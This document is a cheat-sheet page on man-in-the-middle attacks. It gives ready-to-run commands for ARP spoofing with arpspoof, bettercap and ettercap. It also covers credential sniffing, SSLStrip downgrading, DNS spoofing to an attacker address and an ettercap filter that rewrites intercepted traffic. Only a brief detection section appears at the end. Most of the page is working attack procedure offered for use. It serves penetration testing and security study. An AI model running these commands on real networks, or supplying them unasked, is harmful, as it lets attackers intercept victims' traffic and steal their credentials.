> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# MITM Attacks

> Man-in-the-middle attacks: ARP spoofing, bettercap, ettercap, and traffic interception.

## ARP Spoofing — arpspoof

### Enable IP Forwarding

```bash theme={"dark"}
echo 1 > /proc/sys/net/ipv4/ip_forward
```

### Spoof

```bash theme={"dark"}
arpspoof -i eth0 -t TARGET_IP GATEWAY_IP
arpspoof -i eth0 -t GATEWAY_IP TARGET_IP
```

Run both in separate terminals. Traffic flows: Target → Attacker → Gateway.

***

## Bettercap

### Install

```bash theme={"dark"}
apt install bettercap
```

### Start

```bash theme={"dark"}
bettercap -iface eth0
```

### ARP Spoof

```
» net.probe on
» set arp.spoof.targets TARGET_IP
» arp.spoof on
» net.sniff on
```

### Capture Credentials

```
» set net.sniff.verbose true
» net.sniff on
```

### HTTP Proxy (SSLStrip)

```
» set http.proxy.sslstrip true
» http.proxy on
» arp.spoof on
» net.sniff on
```

### Caplet (Script)

```bash theme={"dark"}
# spoof.cap
set arp.spoof.targets TARGET_IP
arp.spoof on
net.sniff on
```

```bash theme={"dark"}
bettercap -iface eth0 -caplet spoof.cap
```

### DNS Spoofing

```
» set dns.spoof.domains target.com
» set dns.spoof.address ATTACKER_IP
» dns.spoof on
```

***

## Ettercap

### GUI

```bash theme={"dark"}
ettercap -G
```

### CLI — ARP Spoof

```bash theme={"dark"}
ettercap -T -q -i eth0 -M arp:remote /TARGET_IP// /GATEWAY_IP//
```

### With Filter

```bash theme={"dark"}
ettercap -T -q -i eth0 -M arp:remote -F filter.ef /TARGET_IP// /GATEWAY_IP//
```

### Compile Filter

```bash theme={"dark"}
etterfilter filter.ecf -o filter.ef
```

### Filter Example (Replace Text)

```
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
    }
}
```

***

## Without Tools — Manual ARP

```bash theme={"dark"}
echo 1 > /proc/sys/net/ipv4/ip_forward

# Send fake ARP replies
# Tell target: "I am the gateway"
# Tell gateway: "I am the target"

# Use scapy or arpspoof
```

***

## Detection

```bash theme={"dark"}
# Check ARP table for duplicates
arp -a | sort

# Wireshark filter
arp.duplicate-address-detected
```

***

## Quick Reference

| Task       | Command                                     |
| ---------- | ------------------------------------------- |
| ARP spoof  | `arpspoof -i eth0 -t TARGET GATEWAY`        |
| Bettercap  | `bettercap -iface eth0` → `arp.spoof on`    |
| Ettercap   | `ettercap -T -M arp:remote /TARGET// /GW//` |
| DNS spoof  | Bettercap: `dns.spoof on`                   |
| IP forward | `echo 1 > /proc/sys/net/ipv4/ip_forward`    |
